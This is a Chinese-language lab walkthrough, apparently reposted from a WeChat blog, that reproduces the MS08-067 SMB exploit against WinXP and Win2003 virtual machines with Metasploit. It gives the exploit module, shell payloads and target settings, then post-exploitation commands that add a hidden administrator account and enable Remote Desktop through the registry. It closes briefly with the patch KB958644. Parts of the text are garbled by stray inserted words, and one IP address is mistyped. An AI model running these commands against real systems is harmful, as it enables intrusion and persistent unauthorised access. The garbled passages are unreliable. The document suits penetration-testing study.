漏洞利用前準備
尋找漏洞
·CVE https://cve.mitre.org/安全
Common Vulnerabilities & Exposures公共漏洞和暴露, 由MITRE 1999年發起以社區做爲努力方向微信
·NVD https://nvd.nist.gov/網絡
美國國家通用漏洞數據庫,National Institute of Standards and Technology (NIST) 2005年發起.app
·CNVD運維
CNVD是國家信息安全漏洞共享平臺,英文是China National Vulnerability Database,隸屬於國家計算機網絡應急技術處理協調中心(CNCERT),CNCERT則是工信部的下屬單位。
·CNNVD http://www.cnnvd.org.cn/
CNNVD是中國國家信息安全漏洞庫,英文名稱China National Vulnerability Database of Information Security,簡稱CNNVD,隸屬於中國信息安全測評中心(通常簡稱國測,國測的主管單位是Security部),是中國信息安全測評中心爲切實履行漏洞分析和風險評估的職能,負責建設運維的國家級信息安全漏洞庫,爲我國信息安全保障提供基礎服務。
·MSRC https://docs.microsoft.com/en-us/security-updates/
Microsoft Security Response Center (微軟安全應急響應中心)提供的 Security Advisories and Bulletins安全警告和公告
咱們今天要介紹的就是MS08-067,看名稱就能夠知道,是在08年的第67個公告 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
虛擬機安裝
須要的文件
·各類虛擬機系統: 自備
·純淨版WinXPSP3:winxp-sp3 English(winxpensp3)
·Kali Linux 虛擬機文件: kali-linux-2020.2-vmware-amd64.7z (默認用戶名密碼不是root/toor而是kali/kali)
安裝過程(略)
·記得將虛擬機的網卡都設置爲橋接模式
·WinXP系統管理員(Administrator)密碼能夠設置爲複雜密碼
·WinXP初次啓動畫面選擇不啓動自動更新,第一個用戶名隨便填寫
·WinXP啓動後關閉Windows自帶防火牆
·Kali若是不是用虛擬機鏡像而是ISO嚮導安裝,建議默認安裝區域和語言都選擇美國英語,而後參考下面的中文支持,不然對通常用戶很麻煩。
·Kali使用默認的qterminal
·Kali中文支持
o打開終端
osudo dpkg-reconfigure locales
裏面選擇en_US.UTF-八、zh_CN.GBK、zh_CN.UTF-8
,用空格選定,用Tab
選擇OK
回車
o默認環境能夠選擇zh_CN.UTF-8
也能夠選擇en_US.UTF-8
o更新包爲最新內容 sudo apt-get update
,有些人也能夠選擇更新到國內源,只是須要修改/etc/apt/sources.list
的源內容,具體能夠提issue詢問如何修改
o安裝默認桌面環境須要的字體sudo apt-get install xfonts-intl-chinese ttf-wqy-microhei
o重啓Kali -> reboot
攻擊者ip爲192.168.1.102
被攻擊的ip爲192.168.1.128
03漏洞利用
先嗅探端口看看445端口開了沒
看到確實開放了445
端口也就是SMB
系統滲透
·進入msf終端
kali@kali:~$ msfconsole
·搜索ms08_067
漏洞信息
msf5 > search ms08_067
·選擇利用此漏洞
msf5 > use exploit/windows/smb/ms08_067_netapi
·設置payload
輸入 show payloads
msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
·設置target爲XP2001
msf exploit(windows/smb/ms08_067_netapi) > set target 6
·設置目標機器IP地址
msf exploit(windows/smb/ms08_067_netapi) > set RHOST "192.168.1.128"
·查看當前滲透選項
msf exploit(windows/smb/ms08_067_netapi) > show options
·開始滲透
這樣就已經成功拿到Windows Shell
漏洞利用
建立Windows用戶,用戶名爲someone
密碼爲12345678
命令
net user someone 12345678 /add
命令成功完成。
將用戶someone
加入管理員組
命令 net localgroup administrators someone /add
命令成功完成
·修改註冊表開啓遠程訪問
命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
操做成功結束
此時用netstat -an
能夠看到3389
端口開啓,說明已經有效了
這樣咱們能夠用遠程桌面鏈接了 例如
rdesktop 192.168.1.128
04 解決方案
升級到最新的Windows系統
安裝KB958644
補丁
Win2003的MS08-067漏洞利用復現和解決方案
漏洞利用前準備
尋找漏洞
·CVE https://cve.mitre.org/
Common Vulnerabilities & Exposures公共漏洞和暴露, 由MITRE 1999年發起以社區做爲努力方向
·NVD https://nvd.nist.gov/
美國國家通用漏洞數據庫,National Institute of Standards and Technology (NIST) 2005年發起.
·CNVD
CNVD是國家信息安全漏洞共享平臺,英文是China National Vulnerability Database,隸屬於國家計算機網絡應急技術處理協調中心(CNCERT),CNCERT則是工信部的下屬單位。
·CNNVD http://www.cnnvd.org.cn/
CNNVD是中國國家信息安全漏洞庫,英文名稱China National Vulnerability Database of Information Security,簡稱CNNVD,隸屬於中國信息安全測評中心(通常簡稱國測,國測的主管單位是Security部),是中國信息安全測評中心爲切實履行漏洞分析和風險評估的職能,負責建設運維的國家級信息安全漏洞庫,爲我國信息安全保障提供基礎服務。
·MSRC https://docs.microsoft.com/en-us/security-updates/
Microsoft Security Response Center (微軟安全應急響應中心)提供的 Security Advisories and Bulletins安全警告和公告
咱們今天要介紹的就是MS08-067,看名稱就能夠知道,是在08年的第67個公告 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
虛擬機安裝
須要的文件
·各類虛擬機系統: 自備
·Win2003虛擬機:Win2K3 Metasploit
·Kali Linux 虛擬機文件: kali-linux-2020.2-vmware-amd64.7z (默認用戶名密碼不是root/toor而是kali/kali)
安裝過程(略)
·記得將虛擬機的網卡都設置爲橋接模式
·Win2003系統管理員(Administrator)密碼能夠設置爲複雜密碼
·Win2003初次啓動畫面選擇不啓動自動更新,第一個用戶名隨便填寫
·Win2003啓動後關閉Windows自帶防火牆
·Kali若是不是用虛擬機鏡像而是ISO嚮導安裝,建議默認安裝區域和語言都選擇美國英語,而後參考下面的中文支持,不然對通常用戶很麻煩。
·Kali使用xfce Terminal
而不是默認的qterminal
0x03 漏洞利用
機器地址
攻擊者ip 192.168.1.105
被攻者IP 192.168.1.128
嗅探端口,看看445端口開放沒
kali@kali:~$ nmap -PS 192.138.1.128
看到確實開放了445
端口也就是SMB
系統滲透
·進入msf終端
kali@kali:~$ msfconsole
·搜索ms08_067
漏洞信息
msf5 > search ms08_067
·選擇利用此漏洞
msf5 > use exploit/windows/smb/ms08_067_netapi
·設置payload
msf5 exploit(windows/smb/ms08_067_netapi) > set payload "generic/shell_bind_tcp"
·設置target爲win2003-english,我這裏不知道他是哪一個因此填0
msf5 exploit(windows/smb/ms08_067_netapi) > set target 0
·設置目標機器和被攻擊機器IP地址RHOST-被攻擊LHOST-攻擊機器
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST "192.168.1.128"
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST"192.168.1.108"
·查看當前滲透選項
msf5 exploit(windows/smb/ms08_067_netapi) > show options
開始滲透
這樣就已經成功拿到Windows Shell
漏洞利用
建立Windows用戶,用戶名爲someone 密碼爲12345678
命令 net user someone 12345678 /add
命令成功完成
將用戶someone加入管理員組
命令net localgroup administrators someone /add
命令成功完成。
修改註冊表開啓遠程訪問
命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
操做成功結束
此時用netstat -an能夠看到3389端口開啓,說明已經有效了
這樣咱們能夠用遠程桌面鏈接了 例如
rdesktop 192.168.1.128
0x04 解決方案
升級到最新的Windows系統
安裝KB958644補丁
本文分享自微信公衆號 - 滲透雲筆記(shentouyun)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。